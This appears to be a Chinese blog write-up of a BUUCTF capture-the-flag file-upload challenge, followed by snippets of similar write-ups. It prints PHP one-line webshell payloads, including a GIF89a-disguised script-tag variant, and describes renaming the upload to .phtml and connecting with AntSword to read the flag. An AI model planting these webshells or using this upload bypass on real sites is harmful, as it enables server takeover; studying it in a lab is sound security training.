BUUCTF——[极客大挑战 2019]Upload 1

最新推荐文章于 2025-10-16 16:43:52 发布
原创 最新推荐文章于 2025-10-16 16:43:52 发布 · 2.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细描述了一种PHP文件上传的绕过方法,通过构造包含PHP代码的图片文件头来规避系统检测。作者首先尝试上传PHP后门,然后将其伪装成jpg格式,但被系统阻止。接着,通过在图片头添加PHP代码并避免使用`<?php`标签,成功创建了一个不被系统识别为PHP的文件。最终,该文件以.phtml后缀上传并执行,实现了远程连接。利用蚁剑工具,作者找到了隐藏的flag,并展示了出来。

1.打开后发现是文件上传题
构建一句话木马

<?php @eval($_POST['shy']);?>

将一句话木马改成jpg文件尝试上传。
抓包改成php
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头,并构建不包含<?>的一句话。

 GIF89a? 
 <script language="php">eval($_REQUEST[shell])</script>

在这里插入图片描述
抓包将jpg改为phtml后缀。
在这里插入图片描述
上传成功
在这里插入图片描述

用蚁剑连接
在这里插入图片描述
打开终端
在这里插入图片描述
使用cat命令查找flag
在这里插入图片描述

flag{d98de6c5-b03b-4f1b-bca6-7db9b2588f33}
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1633
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 2314
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
[极客挑战 2019]Upload 1
最新发布
2503_92869228的博客
10-16 423
本文详细介绍了绕过文件上传过滤的方法。首先确认存在后端格式过滤,通过修改文件头和使用gif图片绕过检测;然后通过burpsuite抓包修改文件扩展名为phtml,同时保持MIME类型不变,成功上传可执行图片马;最后利用蚁剑连接到上传文件获取flag。整个过程展示了如何系统性绕过文件上传的多重安全检测。
第十届极客挑战——复现未解决的web和RE
A_dmin的博客
12-06 1385
第十届极客挑战——复现未解决的web和RE 第十届极客挑战——复现未解决的web和RE web - 性感黄阿姨,在线聊天 web - Eval evil code web - 服务端检测系统 web - 你有特洛伊么 web - 你读懂潇文清的网站了吗 RE - 阅兵你认真看了嘛? RE - python1
BUUCTF [极客挑战 2019]Upload1
2401_86572133的博客
03-30 926
脚本风格与简写风格可以绕过,但是煮波试了<% %>发现不行,看到佬温馨《提醒如果使用简写风格或者ASP风格,则应该在php.ini配置文件中修改如下配置,把这两个参数都设置为On,考虑到这两种风格的移植性较差,通常不推荐使用。最开始查的时候查到将一句话木马插入图片的方法,后来发现可以直接写一句话木马然后用burpsuite抓包的时候再修改数据包,进行绕过。直接地址+/upload+/(上传文件名),连接成功,找到flag。打开以后发现有文件上传的地方,不难看出是文件上传漏洞。还是不行,发生了什么?
BUUCTF】[极客挑战 2019]Upload1
aoao331198的博客
03-13 1225
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
buuctf [极客挑战 2019]Upload 1
02-07
### 关于 BUUCTF 极客挑战 2019Upload 1 题目分析 #### 背景介绍 BUUCTF 是一个知名的网络安全竞赛平台,其中的极客挑战系列题目涵盖了多种安全漏洞利用技巧。Upload 1 属于文件上传类题目,在这类题目中...
BUUCTF——web题目练习
2401_82760239的博客
05-04 925
什么也没有,网页源代码也没有什么信息,于是返回上一个界面,用bp抓包看看里面有没有什么信息。根据页面提示,应该是用菜刀工具进行连接,菜刀和蚁剑作用和功能都差不多,这里我用蚁剑进行连接。再次打开题目环境,删除后上传.phtml的一句话木马,上传成功,用蚁剑连接即可得到flag。查看页面源代码,发现里面有一个跳转页面的连接,点击进去,查看这个页面。然后也没有发现什么信息,源代码也没有什么信息,那就用bp抓包看看。没有什么有用的信息,看看源代码试试。
BUUCTF web 文件上传+文件包含篇
m0_55854679的博客
08-09 3451
文章目录[ACTF2020 新生赛]Include——文件包含 [ACTF2020 新生赛]Include——文件包含 1.打开题目链接,查看题目意思为文件包含 2. 获取到的url为 http://c605348f-44f9-4c25-b602-66c73ee07005.node3.buuoj.cn/?file=flag.php 是一个php文件,返回字符串如下:Can you find out the flag? 猜测读取原码:构造url: ?file=php://filter/read=conve
BUUCTF-WEB
ccfly1012的博客
11-02 4207
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf[ACTF2020 新生赛]Upload 1
qq_53175607的博客
12-06 857
1.打开题目,先上传一句话木马试试。 <script language='php'>@eval($_POST['love']);</script> 按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包! 改为phtml后缀 上传成功,构架url用蚁剑连接。 http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be
ctf题集【BUUCTF WEB】[极客挑战 2019]Upload1
qq_42667028的博客
01-06 2062
alert("whoami")
buuctf-[极客挑战 2019]Upload1
m0_62094846的博客
12-07 378
上传php,jpg,png,gif都报错 然后看wp GIF89a? <script language="php">eval($_REQUEST[feng])</script> 用这一串GIF89a伪造gif文件就行 真的上传不了假的上传成功了,就满脸问号 把后缀名改成phtml 因为没告诉文件上传后的位置,就要猜测,做这么多题,一般都是在upload里面 upload+文件名 ...
BUUCTF---[极客挑战 2019]Upload1
2201_75556700的博客
03-03 830
2.点开链接,需要上传文件,要求是image,上传文件后缀为jpg的一句话木马,发现被检测到了。4.接下来使用bp抓包修改包的后缀为phtml,5.接下来使用蚁剑链接。3.换另一个木马试试。
BUUCTF-[ACTF2020 新生赛]Upload1
Monica的博客
09-22 2165
目录 题目: 分析: 题目: 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞 分析: 先随便上传一个文件,发现提示 并且bp抓包并没有抓到包,说明为前端检测过滤。 那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。 先上传一个jpg文件,内容为<?php phpinfo();?>。 发现后端还是进行了检查过滤 那就试试其他几种后缀: 绕过后缀的有文件格式有php,php3,php...
CTF中的BUUCTF之[极客挑战 2019]Upload
weixin_44632787的博客
06-17 708
CTF中的BUUCTF之[极客挑战 2019]Upload 启动我们的挑战项目 这个界面,一看就知道是文件上传的类型的题目了 所以用我之前准备好的一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 之所以用这种一句话木马,是因为这种过滤方法比原版的:<?php @eval($_POST['attack']);?> 要好用。(个人观点) 将上面的一句话木马保存为1.png。 然后开
buuctf [ACTF2020 新生赛]Upload 1
Naptmn的博客
02-24 1315
直接上传一个php的一句话发现无法上传 f12找到前端验证 这里有两个方法 1、直接删除这个元素 2、先上传jpg格式的一句话,bp抓包改为php 发现上传后后端仍然有检查 于是我们上传phtml格式的一句话木马(这里同样需要绕开前端验证) phtml可以理解为是另外一个php的文件后缀名 上传成功后蚁剑连接即可 ...
Web-[极客挑战 2019] Upload1
汗的博客
05-21 1340
文章目录[极客挑战 2019]Upload1 [极客挑战 2019]Upload1 shell名she.phtml 内容 GIF98a <script language="php">eval($_POST['cmd']);</script> burp抓包Content-Type: image/jpeg 在upload/目录下,访问页面,蚁剑连接,cat /flag ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值